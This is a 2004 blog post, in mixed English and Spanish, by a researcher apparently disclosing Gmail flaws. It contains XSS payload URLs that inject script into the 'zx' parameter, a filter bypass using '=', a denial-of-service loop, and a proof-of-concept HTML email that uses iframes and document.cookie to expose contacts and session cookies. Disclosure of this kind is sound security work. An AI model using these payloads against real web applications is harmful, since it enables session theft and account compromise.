zx issue repair form Gmail can bypass by equal simbol "="

Sunday, December 05, 2004
hello !!

After look this "bug"(http://securitytracker.com/alerts/2004/Nov/1012289.html)
and i look what are you making for correct this issue, and i happy this bug is solved
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556%3Cscript%3Ealert(document.cookie)%3C%2
Fscript%3E&fs=1

but this issue can repeat only ned a '=' symbol in url after 'zx' variablelike this:

Again Denial of service :/
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556[just here inser the simbol]%3Cscript%3Ealert
(document.cookie)%3C%2Fscript%3E&fs=1

http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556=%3Cscript%3Ealert(document.cookie)%3C
%2Fscript%3E&fs=1

and the bucle is repeating :-)

atentamente:
Lostmon (Lostmon@gmail.com)

thnx to estrella to be my ligth
thnx to all who believed in me
--
La curiosidad es lo que hace mover la mente....

Denial of service On gmail account

Si un usuario tiene activa su cookie de Gmail podria
ser vulnenable a este tipo de atake ,en el cual podriamos
llegar hasta denegar el sevicio.


#######################################

Denial of service On gmail account

vendor url: http://gmail.google.com/

vendor notified:yes exploit included :yes

original advisore:http://lostmon.spymac.net/blog/

########################################




si un usuario tiene activa su cookie de ge mail podria ser

vulnenable a este tipo de atake ,en el cual podriamos llegar

hasta denegar el sevicio.



Asi un usuario mal intencionado podria crear una url mal intencionada y...

1- modificar o digamos engaƱar al usuario con una etiketa inexsitente:

http://gmail.google.com/gmail?search=cat&cat=[label_name]
&view=tl&start=0&zx=

como vemos el boton "remove label" nos muestra el titulo incluido en
[label_name] el cual puede no existir

2-Cross-site scripting:

la variable Zx no comprueba ni la longitud intrudicida ni si lo

introducido es correcto permintiendonos incluir codigo script para ser ejecutado.



http://gmail.google.com/gmail?search=cat&cat=etiketa&view=tl&start=0&zx=
8acabd2b173f0d81040559556[XSS-code]&fs=1

3- probocando una denegacion del servicio :)

al permitir la variable zx ejecusion de codigo cualkier codigo ke usemos hara que la variable fs se repita y repita y repita como resultado se obtendra una denegacion de servicio ya que el usuario no podra ver la pagina de gmail al estar "actualizando" cada vez :


http://gmail.google.com/gmail?search=cat&cat=etiketa&
view=tl&start=0&zx=18acabd2b173f0d81040559556%3Cscript%3Ealert
(document.cookie)%3C%2Fscript%3E&fs=1



atentamente

Lostmon (lostmon@gmail.com)

thnx to http://www.ayuda-internet.net for their support

Thnx to Rottew and ismax

Thx to estrella to be my ligth



La curiosidad es lo que hace mover la mente....


Gmail remote information disclosure



hello:


after found a bug in gmail ,i variable 'zx' few time ago i say gmail

reveal contact list to remote users,discloses account name,and gain

acces to account if cookie if active and whith some url can list

contacts labels or other information for sending to atacker´s web
site:

a situation o a proff of concept :


1 send a mail to gmail´s account information is the same...(not

spamming please :D)


2- in this email you send in html format and you can make two actions:


2.1 including code in html of this email (mail.html)

2.2 send a link and wait for users click on ...


if the gmails cookie if active and the user click on,any user can view

this information and can use it or send to ther sites via web form

others


Sample of Mail.html


<html>

<head>

<title>Gmail disclosure informatio Xploit</title>

<meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1">

</head>

<body>

<table width="80%" border="0" align="center">

<tr>

<td><h5> <strong><font face="verdana">contact
list of gmail</font></strong>

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="http://gmail.google.com/gmail?view=page&name=contacts&amp;ver="

></iframe>

</h5></td>

</tr>

<tr>

<td height="21"> <h5><strong>user&acute;s
name

account</strong><script>document.write(document.cookie)</script>

<iframe height="100%" id="iframe" width="100%"

frameborder="0" src="http://gmail.google.com/gmail?view=ca&file=2&zx="

></iframe>

</h5></td>

</tr>

<tr>

<td height="48"> <h5> user account options

<iframe height="100%" id="iframe" width="100%"

frameborder="0"

src="https://www.google.com/accounts/CheckCookie?chtml=LoginDoneHtml"></iframe>

</h5></td>

</tr>

<tr>

<td height="48"><script>document.write(document.cookie)</script> </td>

</tr>

</table>

</body>

</html>


atentamente:

Lostmon (Lostmon@gmail.com)


--

La curiosidad es lo que hace mover la mente....

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...